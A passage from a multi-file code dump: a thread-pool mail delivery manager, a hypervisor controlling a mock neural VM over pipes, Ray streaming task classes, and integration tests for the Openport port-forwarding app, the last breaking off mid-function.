if pool < self._optimum_workers:
tospawn = int(self._optimum_workers - pool)
log.debug("Spawning %d thread%s." % (tospawn, tospawn != 1 and "s" or ""))
for i in range(tospawn):
self._spawn()
@property
def _optimum_workers(self):
return min(self._max_workers, math.ceil(self._work_queue.qsize() / float(self.divisor)))
class DynamicManager(object):
__slots__ = ('workers', 'divisor', 'timeout', 'executor', 'transport')
name = "Dynamic"
Executor = ScalingPoolExecutor
def __init__(self, config, transport):
self.workers = int(config.get('workers', 10)) # Maximum number of threads to create.
self.divisor = int(config.get('divisor', 10)) # Estimate the number of required threads by dividing the queue size by this.
self.timeout = float(config.get('timeout', 60)) # Seconds before starvation.
self.executor = None
self.transport = TransportPool(transport)
super(DynamicManager, self).__init__()
def startup(self):
log.info("%s manager starting up.", self.name)
log.debug("Initializing transport queue.")
self.transport.startup()
workers = self.workers
log.debug("Starting thread pool with %d workers." % (workers, ))
self.executor = self.Executor(workers, self.divisor, self.timeout)
log.info("%s manager ready.", self.name)
def deliver(self, message):
# Return the Future object so the application can register callbacks.
# We pass the message so the executor can do what it needs to to make
# the message thread-local.
return self.executor.submit(partial(worker, self.transport), message)
def shutdown(self, wait=True):
log.info("%s manager stopping.", self.name)
log.debug("Stopping thread pool.")
self.executor.shutdown(wait=wait)
log.debug("Draining transport queue.")
self.transport.shutdown()
log.info("%s manager stopped.", self.name)
|
hypervisor.py
|
"""
HV (main, interactive commands)
<-> IO, source code, nvm directives
NVM (network, encoding, build tools)
<-> network state, viz directives
VIZ (viz)
"""
import sys, time
import multiprocessing as mp
import nvm
class NotRunningError(Exception):
pass
class Hypervisor:
def startup(self, period=1):
self.nvm_pipe, other_end = mp.Pipe()
self.nvm_process = mp.Process(target=run_nvm, args=(other_end, period))
self.nvm_process.start()
self.running = True
def exchange_with_nvm(self, message):
if not self.running: raise NotRunningError()
self.nvm_pipe.send(message)
response = self.nvm_pipe.recv()
return response
def print_nvm(self):
response = self.exchange_with_nvm('print')
print(response)
def show(self):
response = self.exchange_with_nvm('show')
print(response)
def hide(self):
response = self.exchange_with_nvm('hide')
print(response)
def input(self, token):
ready = self.exchange_with_nvm('input')
response = self.exchange_with_nvm(token)
print(ready,response)
def output(self):
response = self.exchange_with_nvm('output')
return response
def set_instruction(self, opcode, *operands):
ready = self.exchange_with_nvm('set_instruction')
opcode_response = self.exchange_with_nvm(opcode)
for operand in operands:
operand_response = self.exchange_with_nvm(operand)
response = self.exchange_with_nvm('end operation')
def shutdown(self):
self.exchange_with_nvm('shutdown')
self.nvm_process.join()
self.nvm_pipe = None
self.nvm_process = None
self.running = False
def quit(self):
if self.running: self.shutdown()
sys.exit(0)
def run_nvm(hv_pipe, period):
# Init NVM
vm = nvm.mock_nvm(layer_size=24)
done = False
while not done:
# step the network
start_time = time.time()
vm.tick()
# process next message
if hv_pipe.poll():
message = hv_pipe.recv()
if message == 'print':
string = 'happy'
hv_pipe.send(string)
if message == 'show':
vm.show()
hv_pipe.send('showing')
if message == 'hide':
vm.hide()
hv_pipe.send('hiding')
if message == 'input':
hv_pipe.send('accepting input')
token = hv_pipe.recv()
vm.set_input(token, 'stdio', from_human_readable=True)
hv_pipe.send('received %s'%token)
if message == 'output':
token = vm.get_output('stdio',to_human_readable=True)
hv_pipe.send(token)
if message == 'set_instruction':
hv_pipe.send('accepting operation')
opcode = hv_pipe.recv()
hv_pipe.send('recieved opcode')
operands = []
while True:
message = hv_pipe.recv()
hv_pipe.send('received operand')
if message == 'end operation': break
operands.append(message)
vm.set_instruction(opcode, *operands)
hv_pipe.send('received operation')
if message == 'shutdown':
vm.hide() # shutdown visualizer if running
done = True
hv_pipe.send('shutdown')
# wait up to period
duration = time.time() - start_time
if duration < period:
time.sleep(period - duration)
if __name__ == '__main__':
period = .1
# Start hypervisor
hv = Hypervisor()
hv.startup(period=period)
hv.show()
time.sleep(period)
hv.input('TRUE')
time.sleep(period)
hv.set_instruction('set','NIL','{0}')
time.sleep(period)
# hv.shutdown()
listener_program = """
set NIL {0} # NIL for exiting loop
loop: get rvmio {1} # get input
compare {0} {1} {2} # compare with NIL
nor {2} {2} {3} # true if not NIL
jump {3} loop # if not NIL, repeat
put rvmio {0}
# end
nop
"""
echo_program = """
set NIL {0} # NIL for exiting loop
loop: get rvmio {1} # get input
put rvmio {1} # echo
compare {0} {1} {2} # compare with NIL
nor {2} {2} {3} # true if not NIL
jump {3} loop # if not NIL, repeat
put rvmio {0}
# end
nop
"""
# if __name__ == '__main__':
# rvm = refvm.RefVM()
# rvmio = refvm.RefIODevice(rvm.machine_readable, rvm.human_readable)
# rvm.install_device('rvmio',rvmio)
# # assembly_code = listener_program
# assembly_code = echo_program
# object_code, label_table = rvm.assemble(assembly_code)
# rvm.load(object_code, label_table)
# hv = Hypervisor()
# print('Starting...')
# hv.start(rvm, rvmio, period=1.0/10)
# hv.show()
|
task.py
|
import logging
import threading
from abc import ABC, abstractmethod
from ray.streaming.collector import OutputCollector
from ray.streaming.config import Config
from ray.streaming.context import RuntimeContextImpl
from ray.streaming.runtime import serialization
from ray.streaming.runtime.serialization import \
PythonSerializer, CrossLangSerializer
from ray.streaming.runtime.transfer import ChannelID, DataWriter, DataReader
logger = logging.getLogger(__name__)
class StreamTask(ABC):
"""Base class for all streaming tasks. Each task runs a processor."""
def __init__(self, task_id, processor, worker):
self.task_id = task_id
self.processor = processor
self.worker = worker
self.reader = None # DataReader
self.writers = {} # ExecutionEdge -> DataWriter
self.thread = None
self.prepare_task()
self.thread = threading.Thread(target=self.run, daemon=True)
def prepare_task(self):
channel_conf = dict(self.worker.config)
channel_size = int(
self.worker.config.get(Config.CHANNEL_SIZE,
Config.CHANNEL_SIZE_DEFAULT))
channel_conf[Config.CHANNEL_SIZE] = channel_size
channel_conf[Config.CHANNEL_TYPE] = self.worker.config \
.get(Config.CHANNEL_TYPE, Config.NATIVE_CHANNEL)
execution_graph = self.worker.execution_graph
execution_node = self.worker.execution_node
# writers
collectors = []
for edge in execution_node.output_edges:
output_actors_map = {}
task_id2_worker = execution_graph.get_task_id2_worker_by_node_id(
edge.target_node_id)
for target_task_id, target_actor in task_id2_worker.items():
channel_name = ChannelID.gen_id(self.task_id, target_task_id,
execution_graph.build_time())
output_actors_map[channel_name] = target_actor
if len(output_actors_map) > 0:
channel_ids = list(output_actors_map.keys())
target_actors = list(output_actors_map.values())
logger.info(
"Create DataWriter channel_ids {}, target_actors {}."
.format(channel_ids, target_actors))
writer = DataWriter(channel_ids, target_actors, channel_conf)
self.writers[edge] = writer
collectors.append(
OutputCollector(writer, channel_ids, target_actors,
edge.partition))
# readers
input_actor_map = {}
for edge in execution_node.input_edges:
task_id2_worker = execution_graph.get_task_id2_worker_by_node_id(
edge.src_node_id)
for src_task_id, src_actor in task_id2_worker.items():
channel_name = ChannelID.gen_id(src_task_id, self.task_id,
execution_graph.build_time())
input_actor_map[channel_name] = src_actor
if len(input_actor_map) > 0:
channel_ids = list(input_actor_map.keys())
from_actors = list(input_actor_map.values())
logger.info("Create DataReader, channels {}, input_actors {}."
.format(channel_ids, from_actors))
self.reader = DataReader(channel_ids, from_actors, channel_conf)
def exit_handler():
# Make DataReader stop read data when MockQueue destructor
# gets called to avoid crash
self.cancel_task()
import atexit
atexit.register(exit_handler)
# TODO(chaokunyang) add task/job config
runtime_context = RuntimeContextImpl(
self.worker.execution_task.task_id,
self.worker.execution_task.task_index, execution_node.parallelism)
logger.info("open Processor {}".format(self.processor))
self.processor.open(collectors, runtime_context)
@abstractmethod
def init(self):
pass
def start(self):
self.thread.start()
@abstractmethod
def run(self):
pass
@abstractmethod
def cancel_task(self):
pass
class InputStreamTask(StreamTask):
"""Base class for stream tasks that execute a
:class:`runtime.processor.OneInputProcessor` or
:class:`runtime.processor.TwoInputProcessor` """
def __init__(self, task_id, processor_instance, worker):
super().__init__(task_id, processor_instance, worker)
self.running = True
self.stopped = False
self.read_timeout_millis = \
int(worker.config.get(Config.READ_TIMEOUT_MS,
Config.DEFAULT_READ_TIMEOUT_MS))
self.python_serializer = PythonSerializer()
self.cross_lang_serializer = CrossLangSerializer()
def init(self):
pass
def run(self):
while self.running:
item = self.reader.read(self.read_timeout_millis)
if item is not None:
msg_data = item.body()
type_id = msg_data[:1]
if (type_id == serialization._PYTHON_TYPE_ID):
msg = self.python_serializer.deserialize(msg_data[1:])
else:
msg = self.cross_lang_serializer.deserialize(msg_data[1:])
self.processor.process(msg)
self.stopped = True
def cancel_task(self):
self.running = False
while not self.stopped:
pass
class OneInputStreamTask(InputStreamTask):
"""A stream task for executing :class:`runtime.processor.OneInputProcessor`
"""
def __init__(self, task_id, processor_instance, worker):
super().__init__(task_id, processor_instance, worker)
class SourceStreamTask(StreamTask):
"""A stream task for executing :class:`runtime.processor.SourceProcessor`
"""
def __init__(self, task_id, processor_instance, worker):
super().__init__(task_id, processor_instance, worker)
def init(self):
pass
def run(self):
self.processor.run()
def cancel_task(self):
pass
|
app_tests.py
|
import urllib2
import subprocess
import unittest
import os
import signal
import sys
from threading import Thread
from unittest import skip
import requests
from time import sleep
import logging
import shutil
import xmlrunner
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
from openport.services import osinteraction, dbhandler
from test_utils import SimpleTcpServer, SimpleTcpClient, lineNumber, SimpleHTTPClient, TestHTTPServer
from test_utils import run_command_with_timeout, get_remote_host_and_port, kill_all_processes, wait_for_response
from test_utils import print_all_output, click_open_for_ip_link, check_tcp_port_forward
from openport.services.utils import run_method_with_timeout
from openport.services.logger_service import get_logger, set_log_level
from openport.apps import openport_app_version
from openport.apps.app_tcp_server import send_exit, is_running
from test_utils import get_nr_of_shares_in_db_file
logger = get_logger(__name__)
#TEST_SERVER = 'https://eu.openport.io'
#TEST_SERVER = 'https://openport.io'
TEST_SERVER = 'https://test2.openport.io'
#TEST_SERVER = 'http://127.0.0.1:8000'
#TEST_SERVER = 'https://us.openport.io'
#TEST_SERVER = 'https://openport-test-main.debleser.lan'
if not osinteraction.is_windows():
PYTHON_EXE = 'env/bin/python'
KILL_SIGNAL = signal.SIGKILL
else:
PYTHON_EXE = 'env\\Scripts\\python.exe'
KILL_SIGNAL = signal.SIGTERM
class AppTests(unittest.TestCase):
def setUp(self):
logging.getLogger('sqlalchemy').setLevel(logging.WARN)
print(self._testMethodName)
set_log_level(logging.DEBUG)
self.processes_to_kill = []
self.osinteraction = osinteraction.getInstance()
self.manager_port = -1
# self.assertFalse(openportmanager.manager_is_running(8001))
self.db_file = os.path.join(os.path.dirname(__file__), 'testfiles', 'tmp', 'tmp_openport_%s.db' % self._testMethodName)
if os.path.exists(self.db_file):
try:
os.remove(self.db_file)
except:
sleep(3)
os.remove(self.db_file)
os.chdir(os.path.dirname(os.path.dirname(os.path.dirname(__file__))))
self.db_handler = dbhandler.DBHandler(self.db_file)
def tearDown(self):
logger.debug('teardown!')
if self.manager_port > 0:
logger.debug('killing manager')
self.kill_manager(self.manager_port)
for session in self.db_handler.get_all_shares():
send_exit(session)
kill_all_processes(self.processes_to_kill)
logger.debug('end of teardown!')
def test_openport_app(self):
port = self.osinteraction.get_open_port()
p = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--local-port', '%s' % port,
'--server', TEST_SERVER, '--verbose', '--database', self.db_file],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p)
remote_host, remote_port, link = get_remote_host_and_port(p, self.osinteraction)
self.check_application_is_still_alive(p)
click_open_for_ip_link(link)
self.assertEqual(1, get_nr_of_shares_in_db_file(self.db_file))
# self.assertFalse(openportmanager.manager_is_running(8001))
check_tcp_port_forward(self, remote_host=remote_host, local_port=port, remote_port=remote_port)
@skip
def test_heavy_load(self):
local_ports = []
threads = []
def click_link(p):
remote_host, remote_port, link = get_remote_host_and_port(p, self.osinteraction, timeout=60)
self.check_application_is_still_alive(p)
click_open_for_ip_link(link)
for i in range(200):
port = self.osinteraction.get_open_port()
local_ports.append(port)
p = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--local-port', '%s' % port,
'--server', TEST_SERVER, '--verbose', '--database', self.db_file],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p)
t = Thread(target=click_link, args=(p,))
t.daemon = True
t.start()
threads.append(t)
for t in threads:
t.join(30)
for local_port in local_ports:
share = self.db_handler.get_share_by_local_port(local_port)
check_tcp_port_forward(self, remote_host=share.server, local_port=local_port, remote_port=share.server_port)
def test_openport_app__daemonize(self):
if osinteraction.is_mac():
# does not work on mac-os
return
port = self.osinteraction.get_open_port()
p = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--local-port', '%s' % port,
'--server', TEST_SERVER, '--verbose', '--database', self.db_file,
'--daemonize'],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p)
#self.osinteraction.print_output_continuously(p, '****')
run_method_with_timeout(p.wait, 3)
output = self.osinteraction.non_block_read(p)
for i in output:
print(i)
self.assertTrue(output[1] == False or 'Traceback' not in output[1])
wait_for_response(lambda : get_nr_of_shares_in_db_file(self.db_file) == 1, timeout=10)
self.assertEqual(1, get_nr_of_shares_in_db_file(self.db_file))
share = self.db_handler.get_share_by_local_port(port, filter_active=False)
click_open_for_ip_link(share.open_port_for_ip_link)
# self.assertFalse(openportmanager.manager_is_running(8001))
check_tcp_port_forward(self, remote_host=share.server, local_port=port, remote_port=share.server_port)
def test_openport_app__no_arguments(self):
p = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py'], stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p)
run_method_with_timeout(p.wait, 10)
output = self.osinteraction.get_all_output(p)
print(output)
self.assertTrue('usage: ' in output[1], output[1])
def test_openport_app__live_site(self):
port = self.osinteraction.get_open_port()
p = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--local-port', '%s' % port,
'--verbose', '--database', self.db_file],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p)
remote_host, remote_port, link = get_remote_host_and_port(p, self.osinteraction)
self.check_application_is_still_alive(p)
click_open_for_ip_link(link)
self.assertEqual(1, get_nr_of_shares_in_db_file(self.db_file))
# self.assertFalse(openportmanager.manager_is_running(8001))
check_tcp_port_forward(self, remote_host=remote_host, local_port=port, remote_port=remote_port)
p.kill()
def test_save_share(self):
port = self.osinteraction.get_open_port()
p = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--local-port', '%s' % port,
'--server', TEST_SERVER, '--verbose', '--database', self.db_file],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p)
remote_host, remote_port, link = get_remote_host_and_port(p, self.osinteraction)
share = self.db_handler.get_share_by_local_port(port, filter_active=False)
self.assertEqual(1, share.id)
self.assertEqual(remote_host, share.server)
self.assertEqual(remote_port, share.server_port)
self.assertEqual(p.pid, share.pid)
self.assertTrue(share.active)
self.assertNotEqual(None, share.account_id)
self.assertNotEqual(None, share.key_id)
self.assertEqual(port, share.local_port)
self.assertNotEqual(None, share.server_session_token)
self.assertEqual('', share.restart_command)
self.assertFalse(share.http_forward)
self.assertEqual(None, share.http_forward_address)
self.assertTrue(share.app_management_port > 1024)
self.assertEqual(link, share.open_port_for_ip_link)
self.assertFalse(share.forward_tunnel)
p.kill()
def test_save_share__restart_on_reboot(self):
port = self.osinteraction.get_open_port()
p = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--local-port', '%s' % port,
'--server', TEST_SERVER, '--verbose', '--database', self.db_file, '--restart-on-reboot'],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p)
remote_host, remote_port, link = get_remote_host_and_port(p, self.osinteraction)
share = self.db_handler.get_share_by_local_port(port, filter_active=False)
self.assertTrue(share.active)
self.assertEqual(['%s' % port, '--restart-on-reboot', '--database', self.db_file, '--verbose', '--server',
TEST_SERVER], share.restart_command)
p.kill()
def test_openport_app__forward_tunnel(self):
port_out = self.osinteraction.get_open_port()
p_out = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--local-port', '%s' % port_out, # --verbose,
'--server', TEST_SERVER, '--database', self.db_file],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p_out)
remote_host, remote_port, link = get_remote_host_and_port(p_out, self.osinteraction)
self.osinteraction.print_output_continuously_threaded(p_out, 'p_out')
#click_open_for_ip_link(link)
#check_tcp_port_forward(self, remote_host=remote_host, local_port=port_out, remote_port=remote_port)
port_in = self.osinteraction.get_open_port()
logger.info('port_in: %s' % port_in)
p_in = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--local-port', '%s' % port_in,
'--server', TEST_SERVER, '--database', self.db_file, '--forward-tunnel', '--verbose',
'--remote-port', str(remote_port)],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p_in)
self.check_application_is_still_alive(p_in)
self.check_application_is_still_alive(p_out)
get_remote_host_and_port(p_in, self.osinteraction, forward_tunnel=True)
check_tcp_port_forward(self, remote_host='127.0.0.1', local_port=port_out, remote_port=port_in)
self.assertEqual(2, get_nr_of_shares_in_db_file(self.db_file))
def test_openport_app__forward_tunnel__no_local_port_passed(self):
port_out = self.osinteraction.get_open_port()
p_out = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--local-port', '%s' % port_out, # --verbose,
'--server', TEST_SERVER, '--database', self.db_file],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p_out)
remote_host, remote_port, link = get_remote_host_and_port(p_out, self.osinteraction)
self.osinteraction.print_output_continuously_threaded(p_out, 'p_out')
p_in = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py',
'--server', TEST_SERVER, '--database', self.db_file, '--forward-tunnel', '--verbose',
'--remote-port', str(remote_port)],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p_in)
self.check_application_is_still_alive(p_in)
self.check_application_is_still_alive(p_out)
#self.osinteraction.print_output_continuously_threaded(p_in, 'p_in')
host, port_in, link = get_remote_host_and_port(p_in, self.osinteraction, forward_tunnel=True)
check_tcp_port_forward(self, remote_host='127.0.0.1', local_port=port_out, remote_port=port_in)
self.assertEqual(2, get_nr_of_shares_in_db_file(self.db_file))
def test_openport_app__forward_tunnel__restart_on_reboot(self):
port_out = self.osinteraction.get_open_port()
p_reverse_tunnel = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--local-port', '%s' % port_out, # --verbose,
'--server', TEST_SERVER, '--database', self.db_file],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
logger.debug('p_reverse_tunnel.pid: %s' % p_reverse_tunnel.pid)
self.processes_to_kill.append(p_reverse_tunnel)
remote_host, remote_port, link = get_remote_host_and_port(p_reverse_tunnel, self.osinteraction)
click_open_for_ip_link(link)
self.osinteraction.print_output_continuously_threaded(p_reverse_tunnel, 'p_reverse_tunnel')
p_forward_tunnel = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py',
'--server', TEST_SERVER, '--database', self.db_file, '--forward-tunnel', '--verbose',
'--remote-port', str(remote_port), '--restart-on-reboot'],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
logger.debug('p_forward_tunnel.pid: %s' % p_forward_tunnel.pid)
self.processes_to_kill.append(p_forward_tunnel)
self.check_application_is_still_alive(p_forward_tunnel)
self.check_application_is_still_alive(p_reverse_tunnel)
#self.osinteraction.print_output_continuously_threaded(p_forward_tunnel, 'p_forward_tunnel')
host, port_in, link = get_remote_host_and_port(p_forward_tunnel, self.osinteraction, forward_tunnel=True)
sleep(2)
in_session = self.db_handler.get_share_by_local_port(port_in, filter_active=False)
in_app_management_port = in_session.app_management_port
check_tcp_port_forward(self, remote_host='127.0.0.1', local_port=port_out, remote_port=port_in)
self.assertEqual(2, get_nr_of_shares_in_db_file(self.db_file))
#
p_forward_tunnel.terminate()
logger.debug('p_forward_tunnel wait')
run_method_with_timeout(p_forward_tunnel.wait, 10)
self.assertFalse(check_tcp_port_forward(self, remote_host='127.0.0.1', local_port=port_out,
remote_port=port_in, fail_on_error=False))
self.assertEqual(1, len(self.db_handler.get_shares_to_restart()))
p_restart = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--restart-shares', '--verbose',
'--database', self.db_file],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p_restart)
self.osinteraction.print_output_continuously_threaded(p_restart, 'p_restart')
logger.debug('p_restart.pid: %s' % p_restart.pid)
logger.debug('p_restart.wait')
run_method_with_timeout(p_restart.wait, 10)
# p_restart.wait()
logger.debug('p_restart.wait done')
self.check_application_is_still_alive(p_reverse_tunnel)
logger.debug('alive!')
check_tcp_port_forward(self, remote_host=remote_host, local_port=port_out, remote_port=remote_port)
def foo():
in_session2 = self.db_handler.get_share_by_local_port(port_in, filter_active=False)
in_app_management_port2 = in_session2.app_management_port
# wait for the session to be renewed
if in_app_management_port == in_app_management_port2:
return False
if not in_session2.active:
return False
return run_method_with_timeout(is_running, args=[in_session2], timeout_s=5)
wait_for_response(foo, timeout=10)
logger.debug('sleeping now')
#sleep(20)
logger.debug('wait_for_response done')
check_tcp_port_forward(self, remote_host='127.0.0.1', local_port=port_out, remote_port=port_in)
def test_openport_app__do_not_restart(self):
port = self.osinteraction.get_open_port()
s = SimpleTcpServer(port)
s.runThreaded()
p = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--local-port', '%s' % port,
'--server', TEST_SERVER, '--verbose', '--database', self.db_file],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p)
remote_host, remote_port, link = get_remote_host_and_port(p, self.osinteraction)
self.check_application_is_still_alive(p)
click_open_for_ip_link(link)
self.assertEqual(1, get_nr_of_shares_in_db_file(self.db_file))
# self.assertFalse(openportmanager.manager_is_running(8001))
c = SimpleTcpClient(remote_host, remote_port)
request = 'hello'
response = c.send(request)
self.assertEqual(request, response.strip())
os.kill(p.pid, KILL_SIGNAL)
run_method_with_timeout(p.wait, 10)
manager_port = self.osinteraction.get_open_port()
p_manager2 = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--database', self.db_file,
'--verbose', '--manager-port', str(manager_port), '--restart-shares'],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p_manager2)
i = 0
while i < 10 and self.application_is_alive(p_manager2):
sleep(1)
i += 1
print_all_output(p_manager2, self.osinteraction, 'p_manager2')
self.assertFalse(self.application_is_alive(p_manager2))
try:
response = c.send(request)
except:
response = ''
self.assertNotEqual(request, response.strip())
c.close()
s.close()
def test_openport_app_get_same_port(self):
port = self.osinteraction.get_open_port()
p = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '%s' % port,
'--server', TEST_SERVER, '--verbose', '--database', self.db_file],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p)
remote_host, remote_port, link = get_remote_host_and_port(p, self.osinteraction)
self.check_application_is_still_alive(p)
click_open_for_ip_link(link)
check_tcp_port_forward(self, remote_host, port, remote_port)
share = self.db_handler.get_share_by_local_port(port)
send_exit(share)
run_method_with_timeout(p.wait, 10)
p = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '%s' % port,
'--server', TEST_SERVER, '--verbose', '--database', self.db_file],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p)
new_remote_host, new_remote_port, link = get_remote_host_and_port(p, self.osinteraction)
self.check_application_is_still_alive(p)
self.assertEqual(remote_port, new_remote_port)
click_open_for_ip_link(link)
check_tcp_port_forward(self, new_remote_host, port, new_remote_port)
def test_openport_app__http_forward(self):
port = self.osinteraction.get_open_port()
p = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--local-port', '%s' % port,
'--server', TEST_SERVER, '--verbose',
'--http-forward', '--database', self.db_file],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p)
remote_host, remote_port, link = get_remote_host_and_port(p, self.osinteraction, output_prefix='app', http_forward=True)
self.check_http_port_forward(remote_host=remote_host, local_port=port)
def test_openport_app__regular_then_http_forward(self):
port = self.osinteraction.get_open_port()
p = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--local-port', '%s' % port,
'--server', TEST_SERVER, '--verbose', '--database', self.db_file],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p)
remote_host, remote_port, link = get_remote_host_and_port(p, self.osinteraction)
self.check_application_is_still_alive(p)
click_open_for_ip_link(link)
self.assertEqual(1, get_nr_of_shares_in_db_file(self.db_file))
# self.assertFalse(openportmanager.manager_is_running(8001))
return_server = []
check_tcp_port_forward(self, remote_host=remote_host, local_port=port, remote_port=remote_port,
return_server=return_server)
p.kill()
for s in return_server:
s.close()
print('closed server')
p.wait()
c = SimpleTcpClient('localhost', port)
def server_is_not_active():
print('checking server_is_not_active')
try:
response = c.send('pong').strip()
except Exception as e:
logger.exception('this is expected')
return True
print(response)
return response != 'pong'
wait_for_response(server_is_not_active, timeout=30)
# sleep(3)
p = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--local-port', '%s' % port,
'--server', TEST_SERVER, '--verbose',
'--http-forward', '--database', self.db_file],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p)
remote_host, remote_port, link = get_remote_host_and_port(p, self.osinteraction, output_prefix='app',
http_forward=True)
self.check_http_port_forward(remote_host=remote_host, local_port=port)
def application_is_alive(self, p):
return run_method_with_timeout(p.poll, 1, raise_exception=False) is None
def check_application_is_still_alive(self, p):
if not self.application_is_alive(p): # process terminated
print ('application terminated: ', self.osinteraction.get_output(p))
self.fail('p_app.poll() should be None but was %s' % p.poll())
def test_exit(self):
port = self.osinteraction.get_open_port()
print ('localport :', port)
p_app = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '%s' % port,
'--verbose', '--server', TEST_SERVER, '--database', self.db_file],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p_app)
remote_host, remote_port, link = get_remote_host_and_port(p_app, self.osinteraction, output_prefix='app')
share = self.db_handler.get_share_by_local_port(port)
send_exit(share, force=True)
run_method_with_timeout(p_app.wait, 10)
self.assertTrue(p_app.poll() is not None)
def test_restart_shares(self):
port = self.osinteraction.get_open_port()
print ('localport :', port)
p_app = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '%s' % port,
'--verbose', '--server', TEST_SERVER,
'--restart-on-reboot', '--database', self.db_file, '--ip-link-protection', 'True'],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p_app)
remote_host, remote_port, link = get_remote_host_and_port(p_app, self.osinteraction, output_prefix='app')
print (lineNumber(), "remote port:", remote_port)
sleep(1)
click_open_for_ip_link(link)
logger.debug('ping')
self.check_application_is_still_alive(p_app)
check_tcp_port_forward(self, remote_host, port, remote_port)
share = self.db_handler.get_share_by_local_port(port)
send_exit(share, force=True)
run_method_with_timeout(p_app.wait, 10)
self.assertTrue(p_app.poll() is not None)
print_all_output(p_app, self.osinteraction, 'p_app')
self.assertEqual(1, get_nr_of_shares_in_db_file(self.db_file))
p_manager2 = subprocess.Popen([PYTHON_EXE, 'openport/apps/openport_app.py', '--database', self.db_file,
'--verbose', '--restart-shares'],
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.osinteraction.print_output_continuously_threaded(p_manager2, 'p_manager2')
self.processes_to_kill.append(p_manager2)
run_method_with_timeout(p_manager2.wait, 10)
#self.assertFalse(self.application_is_alive(p_manager2))
sleep(10)
# todo: replace by /register
share = self.db_handler.get_share_by_local_port(port)
logger.debug(share)
if 'test.' in share.open_port_for_ip_link:
share.open_port_for_ip_link = share.open_port_for_ip_link.replace('https', 'http')
click_open_for_ip_link(share.open_port_for_ip_link)
logger.debug('pong')
check_tcp_port_forward(self, remote_host, port, remote_port)
share = self.db_handler.get_share_by_local_port(port)
send_exit(share, force=True)
sleep(5)
self.assertFalse(check_tcp_port_forward(self, remote_host, port, remote_port, fail_on_error=False))
def test_openport_app__start_twice(self):
port = self.osinteraction.get_open_port()
print ('local port :', port)
manager_port = self.osinteraction.get_open_port()
self.manager_port = manager_port
print ('manager_port :', manager_port)
command = [PYTHON_EXE, 'openport/apps/openport_app.py', str(port), '--database', self.db_file, '--verbose', '--server',
TEST_SERVER]
print('######app1')
p_app = subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p_app)
remote_host1, remote_port1, link1 = get_remote_host_and_port(p_app, self.osinteraction, output_prefix='app')
print('######app2')
p_app2 = subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p_app2)
def foo():
command_output = print_all_output(p_app2, self.osinteraction, 'p_app2')
if command_output[0]:
return 'Port forward already running for port %s' % port in command_output[0], command_output[0]
else:
return False
wait_for_response(foo)
run_method_with_timeout(p_app2.wait, 5)
self.assertFalse(self.application_is_alive(p_app2))
p_app.kill()
run_method_with_timeout(p_app.wait, 5)
print('######app3')
p_app3 = subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE)
self.processes_to_kill.append(p_app3)
sleep(2)
remote_host3, remote_port3, link3 = get_remote_host_and_port(p_app3, self.osinteraction, output_prefix='app3')
self.assertEqual(remote_host1, remote_host3)
self.assertEqual(remote_port1, remote_port3)
def write_to_conf_file(self, section, option, value):
import ConfigParser
config = ConfigParser.ConfigParser()
